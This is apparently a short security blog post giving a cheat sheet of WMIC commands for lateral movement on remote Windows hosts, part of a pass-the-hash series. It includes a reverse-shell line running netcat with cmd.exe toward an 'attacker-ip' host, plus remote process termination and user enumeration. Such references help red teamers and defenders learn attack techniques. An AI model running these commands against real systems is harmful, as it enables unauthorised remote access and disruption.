Oct 292019
 

In previous article, we have introduced the used of WMIC in a « pass the hash » shell.

See below a list of useful wmic commands of gathered around the internet:

rem remember impersonate is ok but delegate is not

rem become familiar with the available aliases
wmic alias list brief
rem see the available methods for any class
wmic [class] call /?

rem file stuff
wmic /node:target DATAFILE where « drive=’c:’ AND path=’\\windows\\' » GET Name,readable,size
wmic /node:target datafile « c:\\temp\\test.txt » call rename c:\temp\abc.txt
wmic /node:target datafile « c:\\temp\\test.txt » call copy c:\temp\abc.txt

rem process stuff
wmic /node:target process call create « nc attacker-ip 9000 -e cmd.exe »
wmic /node:target process call create « cmd.exe /c echo test > c:\temp\test.txt »
wmic /node:target process where name= »explorer.exe » call terminate
wmic /node:target process where processid= »1234″ call terminate
wmic /node:target process get name, processid

rem users and groups stuff
WMIC /node:target USERACCOUNT LIST brief
wmic /node:target path Win32_GroupUser

  One Response to “Demonstrating lateral movement with NTHASH Part #5”

  1. […] psremoting on the remote target host (use wmic / see previous article) : powershell.exe « enable-psremoting […]

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(required)

(required)

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.